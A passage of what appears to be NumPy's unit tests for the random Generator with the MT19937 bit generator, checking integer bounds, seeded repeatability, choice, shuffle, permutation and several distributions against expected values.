tgt = lbnd assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt) tgt = (lbnd + ubnd) // 2 assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt) def test_full_range(self, endpoint): # Test for ticket #1690 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd try: self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt) except Exception as e: raise AssertionError("No error should have been raised, " "but one was with the following " "message:\n\n%s" % str(e)) def test_full_range_array(self, endpoint): # Test for ticket #1690 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd try: self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt) except Exception as e: raise AssertionError("No error should have been raised, " "but one was with the following " "message:\n\n%s" % str(e)) def test_in_bounds_fuzz(self, endpoint): # Don't use fixed seed random = Generator(MT19937()) for dt in self.itype[1:]: for ubnd in [4, 8, 16]: vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16, endpoint=endpoint, dtype=dt) assert_(vals.max() < ubnd) assert_(vals.min() >= 2) vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint, dtype=bool) assert_(vals.max() < 2) assert_(vals.min() >= 0) def test_scalar_array_equiv(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd size = 1000 random = Generator(MT19937(1234)) scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint, dtype=dt) random = Generator(MT19937(1234)) scalar_array = random.integers([lbnd], [ubnd], size=size, endpoint=endpoint, dtype=dt) random = Generator(MT19937(1234)) array = random.integers([lbnd] * size, [ubnd] * size, size=size, endpoint=endpoint, dtype=dt) assert_array_equal(scalar, scalar_array) assert_array_equal(scalar, array) def test_repeatability(self, endpoint): # We use a sha256 hash of generated sequences of 1000 samples # in the range [0, 6) for all but bool, where the range # is [0, 2). Hashes are for little endian numbers. tgt = {'bool': '053594a9b82d656f967c54869bc6970aa0358cf94ad469c81478459c6a90eee3', 'int16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4', 'int32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b', 'int64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1', 'int8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1', 'uint16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4', 'uint32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b', 'uint64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1', 'uint8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1'} for dt in self.itype[1:]: random = Generator(MT19937(1234)) # view as little endian for hash if sys.byteorder == 'little': val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt) else: val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt).byteswap() res = hashlib.sha256(val).hexdigest() assert_(tgt[np.dtype(dt).name] == res) # bools do not depend on endianness random = Generator(MT19937(1234)) val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint, dtype=bool).view(np.int8) res = hashlib.sha256(val).hexdigest() assert_(tgt[np.dtype(bool).name] == res) def test_repeatability_broadcasting(self, endpoint): for dt in self.itype: lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd # view as little endian for hash random = Generator(MT19937(1234)) val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint, dtype=dt) random = Generator(MT19937(1234)) val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint, dtype=dt) assert_array_equal(val, val_bc) random = Generator(MT19937(1234)) val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000, endpoint=endpoint, dtype=dt) assert_array_equal(val, val_bc) @pytest.mark.parametrize( 'bound, expected', [(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612, 3769704066, 1170797179, 4108474671])), (2**32, np.array([517043487, 1364798666, 1733884390, 1353720613, 3769704067, 1170797180, 4108474672])), (2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673, 1831631863, 1215661561, 3869512430]))] ) def test_repeatability_32bit_boundary(self, bound, expected): for size in [None, len(expected)]: random = Generator(MT19937(1234)) x = random.integers(bound, size=size) assert_equal(x, expected if size is not None else expected[0]) def test_repeatability_32bit_boundary_broadcasting(self): desired = np.array([[[1622936284, 3620788691, 1659384060], [1417365545, 760222891, 1909653332], [3788118662, 660249498, 4092002593]], [[3625610153, 2979601262, 3844162757], [ 685800658, 120261497, 2694012896], [1207779440, 1586594375, 3854335050]], [[3004074748, 2310761796, 3012642217], [2067714190, 2786677879, 1363865881], [ 791663441, 1867303284, 2169727960]], [[1939603804, 1250951100, 298950036], [1040128489, 3791912209, 3317053765], [3155528714, 61360675, 2305155588]], [[ 817688762, 1335621943, 3288952434], [1770890872, 1102951817, 1957607470], [3099996017, 798043451, 48334215]]]) for size in [None, (5, 3, 3)]: random = Generator(MT19937(12345)) x = random.integers([[-1], [0], [1]], [2**32 - 1, 2**32, 2**32 + 1], size=size) assert_array_equal(x, desired if size is not None else desired[0]) def test_int64_uint64_broadcast_exceptions(self, endpoint): configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)), np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0), (-2**63-1, -2**63-1))} for dtype in configs: for config in configs[dtype]: low, high = config high = high - endpoint low_a = np.array([[low]*10]) high_a = np.array([high] * 10) assert_raises(ValueError, random.integers, low, high, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low_a, high, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low, high_a, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low_a, high_a, endpoint=endpoint, dtype=dtype) low_o = np.array([[low]*10], dtype=object) high_o = np.array([high] * 10, dtype=object) assert_raises(ValueError, random.integers, low_o, high, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low, high_o, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low_o, high_o, endpoint=endpoint, dtype=dtype) def test_int64_uint64_corner_case(self, endpoint): # When stored in Numpy arrays, `lbnd` is casted # as np.int64, and `ubnd` is casted as np.uint64. # Checking whether `lbnd` >= `ubnd` used to be # done solely via direct comparison, which is incorrect # because when Numpy tries to compare both numbers, # it casts both to np.float64 because there is # no integer superset of np.int64 and np.uint64. However, # `ubnd` is too large to be represented in np.float64, # causing it be round down to np.iinfo(np.int64).max, # leading to a ValueError because `lbnd` now equals # the new `ubnd`. dt = np.int64 tgt = np.iinfo(np.int64).max lbnd = np.int64(np.iinfo(np.int64).max) ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint) # None of these function calls should # generate a ValueError now. actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt) assert_equal(actual, tgt) def test_respect_dtype_singleton(self, endpoint): # See gh-7203 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd dt = np.bool_ if dt is bool else dt sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt) assert_equal(sample.dtype, dt) for dt in (bool, int, np.compat.long): lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd # gh-7284: Ensure that we get Python data types sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt) assert not hasattr(sample, 'dtype') assert_equal(type(sample), dt) def test_respect_dtype_array(self, endpoint): # See gh-7203 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd dt = np.bool_ if dt is bool else dt sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt) assert_equal(sample.dtype, dt) sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint, dtype=dt) assert_equal(sample.dtype, dt) def test_zero_size(self, endpoint): # See gh-7203 for dt in self.itype: sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt) assert sample.shape == (3, 0, 4) assert sample.dtype == dt assert self.rfunc(0, -10, 0, endpoint=endpoint, dtype=dt).shape == (0,) assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4)) assert_equal(random.integers(0, -10, size=0).shape, (0,)) assert_equal(random.integers(10, 10, size=0).shape, (0,)) def test_error_byteorder(self): other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4' with pytest.raises(ValueError): random.integers(0, 200, size=10, dtype=other_byteord_dt) # chi2max is the maximum acceptable chi-squared value. @pytest.mark.slow @pytest.mark.parametrize('sample_size,high,dtype,chi2max', [(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25 (5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30 (10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25 (50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25 ]) def test_integers_small_dtype_chisquared(self, sample_size, high, dtype, chi2max): # Regression test for gh-14774. samples = random.integers(high, size=sample_size, dtype=dtype) values, counts = np.unique(samples, return_counts=True) expected = sample_size / high chi2 = ((counts - expected)**2 / expected).sum() assert chi2 < chi2max class TestRandomDist: # Make sure the random distribution returns the correct value for a # given seed def setup(self): self.seed = 1234567890 def test_integers(self): random = Generator(MT19937(self.seed)) actual = random.integers(-99, 99, size=(3, 2)) desired = np.array([[-80, -56], [41, 37], [-83, -16]]) assert_array_equal(actual, desired) def test_integers_masked(self): # Test masked rejection sampling algorithm to generate array of # uint32 in an interval. random = Generator(MT19937(self.seed)) actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32) desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32) assert_array_equal(actual, desired) def test_integers_closed(self): random = Generator(MT19937(self.seed)) actual = random.integers(-99, 99, size=(3, 2), endpoint=True) desired = np.array([[-80, -56], [ 41, 38], [-83, -15]]) assert_array_equal(actual, desired) def test_integers_max_int(self): # Tests whether integers with closed=True can generate the # maximum allowed Python int that can be converted # into a C long. Previous implementations of this # method have thrown an OverflowError when attempting # to generate this integer. actual = random.integers(np.iinfo('l').max, np.iinfo('l').max, endpoint=True) desired = np.iinfo('l').max assert_equal(actual, desired) def test_random(self): random = Generator(MT19937(self.seed)) actual = random.random((3, 2)) desired = np.array([[0.096999199829214, 0.707517457682192], [0.084364834598269, 0.767731206553125], [0.665069021359413, 0.715487190596693]]) assert_array_almost_equal(actual, desired, decimal=15) random = Generator(MT19937(self.seed)) actual = random.random() assert_array_almost_equal(actual, desired[0, 0], decimal=15) def test_random_float(self): random = Generator(MT19937(self.seed)) actual = random.random((3, 2)) desired = np.array([[0.0969992 , 0.70751746], [0.08436483, 0.76773121], [0.66506902, 0.71548719]]) assert_array_almost_equal(actual, desired, decimal=7) def test_random_float_scalar(self): random = Generator(MT19937(self.seed)) actual = random.random(dtype=np.float32) desired = 0.0969992 assert_array_almost_equal(actual, desired, decimal=7) def test_random_unsupported_type(self): assert_raises(TypeError, random.random, dtype='int32') def test_choice_uniform_replace(self): random = Generator(MT19937(self.seed)) actual = random.choice(4, 4) desired = np.array([0, 0, 2, 2], dtype=np.int64) assert_array_equal(actual, desired) def test_choice_nonuniform_replace(self): random = Generator(MT19937(self.seed)) actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1]) desired = np.array([0, 1, 0, 1], dtype=np.int64) assert_array_equal(actual, desired) def test_choice_uniform_noreplace(self): random = Generator(MT19937(self.seed)) actual = random.choice(4, 3, replace=False) desired = np.array([2, 0, 3], dtype=np.int64) assert_array_equal(actual, desired) actual = random.choice(4, 4, replace=False, shuffle=False) desired = np.arange(4, dtype=np.int64) assert_array_equal(actual, desired) def test_choice_nonuniform_noreplace(self): random = Generator(MT19937(self.seed)) actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1]) desired = np.array([0, 2, 3], dtype=np.int64) assert_array_equal(actual, desired) def test_choice_noninteger(self): random = Generator(MT19937(self.seed)) actual = random.choice(['a', 'b', 'c', 'd'], 4) desired = np.array(['a', 'a', 'c', 'c']) assert_array_equal(actual, desired) def test_choice_multidimensional_default_axis(self): random = Generator(MT19937(self.seed)) actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3) desired = np.array([[0, 1], [0, 1], [4, 5]]) assert_array_equal(actual, desired) def test_choice_multidimensional_custom_axis(self): random = Generator(MT19937(self.seed)) actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1) desired = np.array([[0], [2], [4], [6]]) assert_array_equal(actual, desired) def test_choice_exceptions(self): sample = random.choice assert_raises(ValueError, sample, -1, 3) assert_raises(ValueError, sample, 3., 3) assert_raises(ValueError, sample, [], 3) assert_raises(ValueError, sample, [1, 2, 3, 4], 3, p=[[0.25, 0.25], [0.25, 0.25]]) assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2]) assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1]) assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4]) assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False) # gh-13087 assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False) assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False) assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False) assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False, p=[1, 0, 0]) def test_choice_return_shape(self): p = [0.1, 0.9] # Check scalar assert_(np.isscalar(random.choice(2, replace=True))) assert_(np.isscalar(random.choice(2, replace=False))) assert_(np.isscalar(random.choice(2, replace=True, p=p))) assert_(np.isscalar(random.choice(2, replace=False, p=p))) assert_(np.isscalar(random.choice([1, 2], replace=True))) assert_(random.choice([None], replace=True) is None) a = np.array([1, 2]) arr = np.empty(1, dtype=object) arr[0] = a assert_(random.choice(arr, replace=True) is a) # Check 0-d array s = tuple() assert_(not np.isscalar(random.choice(2, s, replace=True))) assert_(not np.isscalar(random.choice(2, s, replace=False))) assert_(not np.isscalar(random.choice(2, s, replace=True, p=p))) assert_(not np.isscalar(random.choice(2, s, replace=False, p=p))) assert_(not np.isscalar(random.choice([1, 2], s, replace=True))) assert_(random.choice([None], s, replace=True).ndim == 0) a = np.array([1, 2]) arr = np.empty(1, dtype=object) arr[0] = a assert_(random.choice(arr, s, replace=True).item() is a) # Check multi dimensional array s = (2, 3) p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2] assert_equal(random.choice(6, s, replace=True).shape, s) assert_equal(random.choice(6, s, replace=False).shape, s) assert_equal(random.choice(6, s, replace=True, p=p).shape, s) assert_equal(random.choice(6, s, replace=False, p=p).shape, s) assert_equal(random.choice(np.arange(6), s, replace=True).shape, s) # Check zero-size assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4)) assert_equal(random.integers(0, -10, size=0).shape, (0,)) assert_equal(random.integers(10, 10, size=0).shape, (0,)) assert_equal(random.choice(0, size=0).shape, (0,)) assert_equal(random.choice([], size=(0,)).shape, (0,)) assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape, (3, 0, 4)) assert_raises(ValueError, random.choice, [], 10) def test_choice_nan_probabilities(self): a = np.array([42, 1, 2]) p = [None, None, None] assert_raises(ValueError, random.choice, a, p=p) def test_choice_p_non_contiguous(self): p = np.ones(10) / 5 p[1::2] = 3.0 random = Generator(MT19937(self.seed)) non_contig = random.choice(5, 3, p=p[::2]) random = Generator(MT19937(self.seed)) contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2])) assert_array_equal(non_contig, contig) def test_choice_return_type(self): # gh 9867 p = np.ones(4) / 4. actual = random.choice(4, 2) assert actual.dtype == np.int64 actual = random.choice(4, 2, replace=False) assert actual.dtype == np.int64 actual = random.choice(4, 2, p=p) assert actual.dtype == np.int64 actual = random.choice(4, 2, p=p, replace=False) assert actual.dtype == np.int64 def test_choice_large_sample(self): choice_hash = '4266599d12bfcfb815213303432341c06b4349f5455890446578877bb322e222' random = Generator(MT19937(self.seed)) actual = random.choice(10000, 5000, replace=False) if sys.byteorder != 'little': actual = actual.byteswap() res = hashlib.sha256(actual.view(np.int8)).hexdigest() assert_(choice_hash == res) def test_bytes(self): random = Generator(MT19937(self.seed)) actual = random.bytes(10) desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd' assert_equal(actual, desired) def test_shuffle(self): # Test lists, arrays (of various dtypes), and multidimensional versions # of both, c-contiguous or not: for conv in [lambda x: np.array([]), lambda x: x, lambda x: np.asarray(x).astype(np.int8), lambda x: np.asarray(x).astype(np.float32), lambda x: np.asarray(x).astype(np.complex64), lambda x: np.asarray(x).astype(object), lambda x: [(i, i) for i in x], lambda x: np.asarray([[i, i] for i in x]), lambda x: np.vstack([x, x]).T, # gh-11442 lambda x: (np.asarray([(i, i) for i in x], [("a", int), ("b", int)]) .view(np.recarray)), # gh-4270 lambda x: np.asarray([(i, i) for i in x], [("a", object, (1,)), ("b", np.int32, (1,))])]: random = Generator(MT19937(self.seed)) alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]) random.shuffle(alist) actual = alist desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7]) assert_array_equal(actual, desired) def test_shuffle_custom_axis(self): random = Generator(MT19937(self.seed)) actual = np.arange(16).reshape((4, 4)) random.shuffle(actual, axis=1) desired = np.array([[ 0, 3, 1, 2], [ 4, 7, 5, 6], [ 8, 11, 9, 10], [12, 15, 13, 14]]) assert_array_equal(actual, desired) random = Generator(MT19937(self.seed)) actual = np.arange(16).reshape((4, 4)) random.shuffle(actual, axis=-1) assert_array_equal(actual, desired) def test_shuffle_axis_nonsquare(self): y1 = np.arange(20).reshape(2, 10) y2 = y1.copy() random = Generator(MT19937(self.seed)) random.shuffle(y1, axis=1) random = Generator(MT19937(self.seed)) random.shuffle(y2.T) assert_array_equal(y1, y2) def test_shuffle_masked(self): # gh-3263 a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1) b = np.ma.masked_values(np.arange(20) % 3 - 1, -1) a_orig = a.copy() b_orig = b.copy() for i in range(50): random.shuffle(a) assert_equal( sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask])) random.shuffle(b) assert_equal( sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask])) def test_shuffle_exceptions(self): random = Generator(MT19937(self.seed)) arr = np.arange(10) assert_raises(np.AxisError, random.shuffle, arr, 1) arr = np.arange(9).reshape((3, 3)) assert_raises(np.AxisError, random.shuffle, arr, 3) assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None)) arr = [[1, 2, 3], [4, 5, 6]] assert_raises(NotImplementedError, random.shuffle, arr, 1) def test_permutation(self): random = Generator(MT19937(self.seed)) alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0] actual = random.permutation(alist) desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7] assert_array_equal(actual, desired) random = Generator(MT19937(self.seed)) arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T actual = random.permutation(arr_2d) assert_array_equal(actual, np.atleast_2d(desired).T) bad_x_str = "abcd" assert_raises(np.AxisError, random.permutation, bad_x_str) bad_x_float = 1.2 assert_raises(np.AxisError, random.permutation, bad_x_float) random = Generator(MT19937(self.seed)) integer_val = 10 desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6] actual = random.permutation(integer_val) assert_array_equal(actual, desired) def test_permutation_custom_axis(self): a = np.arange(16).reshape((4, 4)) desired = np.array([[ 0, 3, 1, 2], [ 4, 7, 5, 6], [ 8, 11, 9, 10], [12, 15, 13, 14]]) random = Generator(MT19937(self.seed)) actual = random.permutation(a, axis=1) assert_array_equal(actual, desired) random = Generator(MT19937(self.seed)) actual = random.permutation(a, axis=-1) assert_array_equal(actual, desired) def test_permutation_exceptions(self): random = Generator(MT19937(self.seed)) arr = np.arange(10) assert_raises(np.AxisError, random.permutation, arr, 1) arr = np.arange(9).reshape((3, 3)) assert_raises(np.AxisError, random.permutation, arr, 3) assert_raises(TypeError, random.permutation, arr, slice(1, 2, None)) @pytest.mark.parametrize("dtype", [int, object]) @pytest.mark.parametrize("axis, expected", [(None, np.array([[3, 7, 0, 9, 10, 11], [8, 4, 2, 5, 1, 6]])), (0, np.array([[6, 1, 2, 9, 10, 11], [0, 7, 8, 3, 4, 5]])), (1, np.array([[ 5, 3, 4, 0, 2, 1], [11, 9, 10, 6, 8, 7]]))]) def test_permuted(self, dtype, axis, expected): random = Generator(MT19937(self.seed)) x = np.arange(12).reshape(2, 6).astype(dtype) random.permuted(x, axis=axis, out=x) assert_array_equal(x, expected) random = Generator(MT19937(self.seed)) x = np.arange(12).reshape(2, 6).astype(dtype) y = random.permuted(x, axis=axis) assert y.dtype == dtype assert_array_equal(y, expected) def test_permuted_with_strides(self): random = Generator(MT19937(self.seed)) x0 = np.arange(22).reshape(2, 11) x1 = x0.copy() x = x0[:, ::3] y = random.permuted(x, axis=1, out=x) expected = np.array([[0, 9, 3, 6], [14, 20, 11, 17]]) assert_array_equal(y, expected) x1[:, ::3] = expected # Verify that the original x0 was modified in-place as expected. assert_array_equal(x1, x0) def test_permuted_empty(self): y = random.permuted([]) assert_array_equal(y, []) @pytest.mark.parametrize('outshape', [(2, 3), 5]) def test_permuted_out_with_wrong_shape(self, outshape): a = np.array([1, 2, 3]) out = np.zeros(outshape, dtype=a.dtype) with pytest.raises(ValueError, match='same shape'): random.permuted(a, out=out) def test_permuted_out_with_wrong_type(self): out = np.zeros((3, 5), dtype=np.int32) x = np.ones((3, 5)) with pytest.raises(TypeError, match='Cannot cast'): random.permuted(x, axis=1, out=out) def test_beta(self): random = Generator(MT19937(self.seed)) actual = random.beta(.1, .9, size=(3, 2)) desired = np.array( [[1.083029353267698e-10, 2.449965303168024e-11], [2.397085162969853e-02, 3.590779671820755e-08], [2.830254190078299e-04, 1.744709918330393e-01]]) assert_array_almost_equal(actual, desired, decimal=15) def test_binomial(self): random = Generator(MT19937(self.seed)) actual = random.binomial(100.123, .456, size=(3, 2)) desired = np.array([[42, 41], [42, 48], [44, 50]]) assert_array_equal(actual, desired) random = Generator(MT19937(self.seed)) actual = random.binomial(100.123, .456) desired = 42 assert_array_equal(actual, desired) def test_chisquare(self): random = Generator(MT19937(self.seed)) actual = random.chisquare(50, size=(3, 2)) desired = np.array([[32.9850547060149, 39.0219480493301], [56.2006134779419, 57.3474165711485], [55.4243733880198, 55.4209797925213]]) assert_array_almost_equal(actual, desired, decimal=13) def test_dirichlet(self): random = Generator(MT19937(self.seed)) alpha = np.array([51.72840233779265162, 39.74494232180943953]) actual = random.dirichlet(alpha, size=(3, 2)) desired = np.array([[[0.5439892869558927, 0.45601071304410745], [0.5588917345860708, 0.4411082654139292 ]], [[0.5632074165063435, 0.43679258349365657], [0.54862581112627, 0.45137418887373015]], [[0.49961831357047226, 0.5003816864295278 ], [0.52374806183482, 0.47625193816517997]]]) assert_array_almost_equal(actual, desired, decimal=15) bad_alpha = np.array([5.4e-01, -1.0e-16]) assert_raises(ValueError, random.dirichlet, bad_alpha) random = Generator(MT19937(self.seed)) alpha = np.array([51.72840233779265162, 39.74494232180943953]) actual = random.dirichlet(alpha) assert_array_almost_equal(actual, desired[0, 0], decimal=15) def test_dirichlet_size(self): # gh-3173 p = np.array([51.72840233779265162, 39.74494232180943953]) assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2)) assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2)) assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2)) assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2)) assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2)) assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2)) assert_raises(TypeError, random.dirichlet, p, float(1)) def test_dirichlet_bad_alpha(self): # gh-2089 alpha = np.array([5.4e-01, -1.0e-16]) assert_raises(ValueError, random.dirichlet, alpha) # gh-15876 assert_raises(ValueError, random.dirichlet, [[5, 1]]) assert_raises(ValueError, random.dirichlet, [[5], [1]]) assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]]) assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]])) def test_dirichlet_alpha_non_contiguous(self): a = np.array([51.72840233779265162, -1.0, 39.74494232180943953]) alpha = a[::2] random = Generator(MT19937(self.seed)) non_contig = random.dirichlet(alpha, size=(3, 2)) random = Generator(MT19937(self.seed)) contig = random.dirichlet(np.ascontiguousarray(alpha), size=(3, 2)) assert_array_almost_equal(non_contig, contig) def test_dirichlet_small_alpha(self): eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc. alpha = eps * np.array([1., 1.0e-3]) random = Generator(MT19937(self.seed)) actual = random.dirichlet(alpha, size=(3, 2)) expected = np.array([ [[1., 0.], [1., 0.]], [[1., 0.], [1., 0.]], [[1., 0.], [1., 0.]] ]) assert_array_almost_equal(actual, expected, decimal=15) @pytest.mark.slow def test_dirichlet_moderately_small_alpha(self): # Use alpha.max() < 0.1 to trigger stick breaking code path alpha = np.array([0.02, 0.04, 0.03]) exact_mean = alpha / alpha.sum() random = Generator(MT19937(self.seed)) sample = random.dirichlet(alpha, size=20000000) sample_mean = sample.mean(axis=0) assert_allclose(sample_mean, exact_mean, rtol=1e-3) def test_exponential(self): random = Generator(MT19937(self.seed)) actual = random.exponential(1.1234, size=(3, 2)) desired = np.array([[0.098845481066258, 1.560752510746964], [0.075730916041636, 1.769098974710777], [1.488602544592235, 2.49684815275751 ]]) assert_array_almost_equal(actual, desired, decimal=15) def test_exponential_0(self): assert_equal(random.exponential(scale=0), 0) assert_raises(ValueError, random.exponential, scale=-0.) def test_f(self): random = Generator(MT19937(self.seed)) actual = random.f(12, 77, size=(3, 2)) desired = np.array([[0.461720027077085, 1.100441958872451], [1.100337455217484, 0.91421736740018 ], [0.500811891303113, 0.826802454552058]]) assert_array_almost_equal(actual, desired, decimal=15) def test_gamma(self): random = Generator(MT19937(self.seed)) actual = random.gamma(5, 3, size=(3, 2)) desired = np.array([[ 5.03850858902096, 7.9228656732049 ], [18.73983605132985, 19.57961681699238], [18.17897755150825, 18.17653912505234]]) assert_array_almost_equal(actual, desired, decimal=14) def test_gamma_0(self): assert_equal(random.gamma(shape=0, scale=0), 0) assert_raises(ValueError, random.gamma, shape=-0., scale=-0.) def test_geometric(self): random = Generator(MT19937(self.seed)) actual = random.geometric(.123456789, size=(3, 2)) desired = np.array([[ 1, 10], [ 1, 12], [ 9, 10]]) assert_array_equal(actual, desired) def test_geometric_exceptions(self): assert_raises(ValueError, random.geometric, 1.1) assert_raises(ValueError, random.geometric, [1.1] * 10) assert_raises(ValueError, random.geometric, -0.1) assert_raises(ValueError, random.geometric, [-0.1] * 10) with np.errstate(invalid='ignore'): assert_raises(ValueError, random.geometric, np.nan) assert_raises(ValueError, random.geometric, [np.nan] * 10) def test_gumbel(self): random = Generator(MT19937(self.seed)) actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2)) desired = np.array([[ 4.688397515056245, -0.289514845417841], [ 4.981176042584683, -0.633224272589149], [-0.055915275687488, -0.333962478257953]]) assert_array_almost_equal(actual, desired, decimal=15) def test_gumbel_0(self): assert_equal(random.gumbel(scale=0), 0) assert_raises(ValueError, random.gumbel, scale=-0.) def test_hypergeometric(self): random = Generator(MT19937(self.seed)) actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2)) desired = np.array([[ 9, 9], [ 9, 9], [10, 9]]) assert_array_equal(actual, desired) # Test nbad = 0 actual = random.hypergeometric(5, 0, 3, size=4) desired = np.array([3, 3, 3, 3]) assert_array_equal(actual, desired) actual = random.hypergeometric(15, 0, 12, size=4) desired = np.array([12, 12, 12, 12]) assert_array_equal(actual, desired) # Test ngood = 0 actual = random.hypergeometric(0, 5, 3, size=4) desired = np.array([0, 0, 0, 0]) assert_array_equal(actual, desired) actual = random.hypergeometric(0, 15, 12, size=4) desired = np.array([0, 0, 0, 0]) assert_array_equal(actual, desired) def test_laplace(self): random = Generator(MT19937(self.seed)) actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2)) desired = np.array([[-3.156353949272393, 1.195863024830054], [-3.435458081645966, 1.656882398925444], [ 0.924824032467446, 1.251116432209336]]) assert_array_almost_equal(actual, desired, decimal=15) def test_laplace_0(self): assert_equal(random.laplace(scale=0), 0) assert_raises(ValueError, random.laplace, scale=-0.) def 